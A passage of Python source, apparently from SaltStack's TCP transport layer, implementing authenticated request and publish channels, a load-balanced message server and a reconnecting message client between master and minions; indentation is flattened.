handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super(LoadBalancerServer, self).__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
'''
@tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get('publish_port', 4506)) != 4506:
self.publish_port = self.opts.get('publish_port')
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds['publish_port']
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.publish_port),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
six.reraise(*sys.exc_info())
self._socket.close()
self._socket = None
if hasattr(self.req_server, 'shutdown'):
try:
self.req_server.shutdown()
except Exception as exc:
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
elif hasattr(self.req_server, 'stop'):
try:
self.req_server.stop()
except socket.error as exc:
if exc.errno != 9:
raise
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
ssl_options=self.opts.get('ssl'),
io_loop=self.io_loop)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
Handle incoming messages from underylying tcp streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
io_loop = kwargs.pop('io_loop', None) or tornado.ioloop.IOLoop.current()
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
self._shutting_down = False
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.remove_client((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
'''
Shutdown the whole server
'''
if self._shutting_down:
return
self._shutting_down = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except socket.error as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
self._stop.set()
self.thread.join()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(resolver=resolver)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
max_buffer_size=max_buffer_size)
if tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (self.io_loop != tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop()
)
self.io_loop.start()
except Exception as e:
log.info('Exception caught in SaltMessageClient.close: %s', str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {'source_ip': self.source_ip,
'source_port': self.source_port}
else:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
**kwargs)
self._connecting_future.set_result(True)
break
except Exception as exc:
log.warn('TCP Message Client encountered an exception %r', exc)
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
